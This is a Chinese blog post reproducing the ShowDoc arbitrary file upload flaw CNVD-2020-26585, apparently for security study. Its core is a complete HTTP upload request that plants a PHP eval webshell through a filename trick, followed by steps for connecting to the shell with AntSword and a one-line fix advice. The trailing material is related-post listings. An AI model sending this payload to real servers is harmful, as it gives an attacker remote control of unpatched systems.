ShowDoc文件上传漏洞(CNVD-2020-26585)

已于 2024-03-20 10:08:10 修改
阅读量1k 收藏 6
点赞数 19
文章标签: web安全 网络安全
于 2024-03-20 10:03:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57900228/article/details/136864603
版权

声明:文章仅供安全研究与学习之用,请勿用于非法用途!

一、漏洞简介

       ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。 api_page存在任意文件上传。

二、漏洞复现

1、先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg 如果出现“ 没有上传的文件! ”,说明可能存在漏洞并可以尝试利用。

2、打开页面直接抓包后改包

payload:

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php eval(@$_POST['mima']);?>
----------------------------921378126371623762173617--

3、文件上传成功(上图),复制链接至蚁剑,将所有的“\”去除。蚁剑连接成功!

三、修复建议

       升级到最新版本。

茉香奶绿正常冰
关注
  • 19
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ShowDoc item_id 未授权SQL注入漏洞复现
0xSec
06-05 1067
2024年6月,ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可暴破用户token获取系统后台权限,建议所有使用该系统的企业尽快升级修复,以确保系统安全。
Showdoc V3.2.5最新版远程代码执行漏洞复现
最新发布
WuYSec的博客
06-05 569
ShowDoc是一个功能强大、易于使用、免费开源的文档管理系统。通过ShowDoc,可以方便地使用Markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线Excel文档。攻击者通过SQL注入漏洞获取到token进入后台。进入后台后可结合反序列化漏洞,写入WebShell,从而获取服务器权限。
ShowDoc漏洞学习——CNVD-2020-26585(任意文件
记录并分享学习安全的知识点..
07-24 1141
ShowDoc一个非常适合IT团队的API文档、技术文档工具。2.8.3以下版本的ShowDoc 存在任意文件漏洞,攻击者通过构造特殊的数据包可以上恶意文件控制服务器。
showdoc 文件漏洞(cnvd-2020-26585)
xy_wjyjw的博客
10-29 240
刷新页面,点击(Intercept is off)开始抓包。打开虚拟终端,输入命令(dir /tmp),查看flag。替换全部报文,修改Host和一句话木马。用蚁剑连接,连接成功,并添加。发送给respones,showdoc 文件上。在bp网页中打开ip(发送到Repeater。
漏洞复现-showdoc-文件】​vulfocus/showdoc-cnvd_2020_26585
10-10 2040
showdoc-文件】API_page存在任意文件
ShowDoc后台文件漏洞复现 CVE-2021-41745&CNVD-2020-49480
afei001
08-09 1219
ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。Showdoc存在文件漏洞,攻击者可以利用漏洞获取服务器权限。
showdoc 文件CNVD-2020-26585)漏洞复现
weixin_42675091的博客
09-03 1904
showdoc 文件CNVD-2020-26585)漏洞复现
showdoc-master.zip
07-28
"showdoc-master.zip" 是一个压缩包文件,其名称表明它包含了 "showdoc-master" 项目的源代码或资源。ShowDoc 是一个开源的文档管理系统,主要用于项目文档的编写、管理和分享,尤其适合软件开发团队使用。它以 ...
swagger-showdoc:一个将swagger的Json文件转换为ShowDoc的小工具
05-01
本项目旨在帮助使用swagger项目的团队,利用现有的swagger.json格式文件来实现文档的自动生成,文档的展示使用了showDoc 软件架构 Spring Boot 2.0.3 JDK 1.8 swagger2markup 1.3.3 okhttp 3.11.0 使用说明 克隆项目...
docker部署showdoc
12-10
docker部署showdoc
showDoc部署资源
11-02
简单在windows上部署showDoc,包含IP的修改和部署中出现的问题
showdoc, ShowDoc是一个非常适用于it团队在网上共享文档的工具.zip
10-10
showdoc, ShowDoc是一个非常适用于it团队在网上共享文档的工具 中文版教程:https://www.showdoc.cc/help什么是 ShowDoc?每当我们接受一个由它的他人开发的模块或者项目时,我们总是觉得那些没有注释的代码。 文档文件在哪里? ! 给我看看医生 ! 程序员经常希望它的他
showdoc本地搭建文件.rar
09-30
内容包括: 1、PHP运行环境(WAMP)wamp-server-wamp5-2-5-multi-win.zip 2、vcredist_x86(环境文件) 3、showdoc部署代码 以上资源仅为学习使用,如有问题欢迎联系进行修改
showdoc-master
11-09
在"showdoc-master"压缩包中,我们通常会找到源代码、配置文件、示例文档等资源,这些都为我们深入理解和定制showdoc提供了可能。通过解压并分析这些文件,开发人员可以根据自身项目的特性进行二次开发,实现更多...
showdoc-sqlite
03-15
至于压缩包子文件"showdoc-sqlite"本身,通常会包含程序的可执行文件、库文件、帮助文档、示例数据库和可能的配置文件。用户解压后直接运行相应的可执行文件,即可启动这个SQLite数据库管理和文档工具。 总结来说,...
ShowDoc远程下载导致文件漏洞复现 CVE-2021-36440&CVE-2022-1034
afei001
08-07 987
ShowDoc v2.9.5中,不受限制的文件允许远程攻击者通过组件AdminUpdateController.class.php中的'file_url'参数执行任意代码。
ShowDoc后台文件漏洞分析 CNVD-2020-49480(CVE-2021-41745)
afei001
08-06 654
​ github获取ShowDoc源码,版本:ShowDoc v2.8.2,使用phpstudy本地搭建环境。环境搭建参考官网:ShowDoc
ShowDoc 远程代码执行漏洞
weixin_51387754的博客
11-02 2700
漏洞简介 ShowDoc 是一个非常适合 IT 团队的在线文档分享工具,它可以加快团队之间沟通的效率。 漏洞复现 fofa语句: app=“ShowDoc” 抓包 POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding:
Linux服务器 部署showdoc
06-14
好的,您可以按照以下步骤来部署 ShowDoc 在 Linux 服务器上: 1. 安装 LAMP 环境:在 Linux 服务器上安装 Apache、MySQL 和 PHP 环境。 2. 下载 ShowDoc:在 ShowDoc 的官网上下载最新的压缩包。 3. 解压 ShowDoc:将下载的压缩包解压到 Apache 的 Web 目录下。 4. 配置数据库:创建一个 MySQL 数据库,并将 ShowDoc 的配置文件中的数据库配置信息修改为对应的值。 5. 创建管理员账号:运行 ShowDoc 提供的脚本来创建一个管理员账号,以便后续的管理工作。 6. 配置 Apache:在 Apache 的配置文件中添加一个虚拟主机,将 ShowDoc 的根目录指定为虚拟主机的 DocumentRoot。 7. 重启 Apache:重启 Apache 服务以使新的配置生效。 8. 访问 ShowDoc:在浏览器中输入虚拟主机的地址,就可以访问 ShowDoc 了。 希望以上步骤能够帮到您。如果您在部署过程中遇到任何问题,可以随时向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值